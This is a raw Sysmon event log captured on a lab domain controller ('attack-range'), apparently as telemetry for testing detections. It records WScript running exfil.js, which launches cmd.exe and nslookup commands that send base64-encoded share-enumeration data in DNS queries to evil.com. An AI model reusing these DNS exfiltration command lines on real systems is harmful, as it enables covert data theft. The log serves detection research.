10341000x8000000000000000211652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-18E0-629A-6742-000000005F02}39767152C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-B944-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.527{2E1864BB-18F3-629A-B944-000000005F02}312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkbwgj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.501{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvikskn.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.485{2E1864BB-18F3-629A-B744-000000005F02}38604572C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B844-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.481{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.480{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B844-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.479{2E1864BB-18F3-629A-B644-000000005F02}70281240C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-B844-000000005F02}7544C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.479{2E1864BB-18F3-629A-B844-000000005F02}7544C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-B644-000000005F02}7028C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvikskn.tmp 2>&1 10341000x8000000000000000211641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.448{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B744-000000005F02}3860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.431{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-B744-000000005F02}3860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.431{2E1864BB-18F3-629A-B744-000000005F02}38604572C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B644-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B744-000000005F02}3860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B644-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.415{2E1864BB-18E0-629A-6742-000000005F02}39764228C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-B644-000000005F02}7028C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.418{2E1864BB-18F3-629A-B644-000000005F02}7028C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvikskn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.400{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqad.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-18F3-629A-B444-000000005F02}48325420C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B544-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B544-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.362{2E1864BB-18F3-629A-B344-000000005F02}77085124C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-B544-000000005F02}2308C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.365{2E1864BB-18F3-629A-B544-000000005F02}2308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-B344-000000005F02}7708C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqad.tmp 2>&1 354300x8000000000000000211621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.723{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50924- 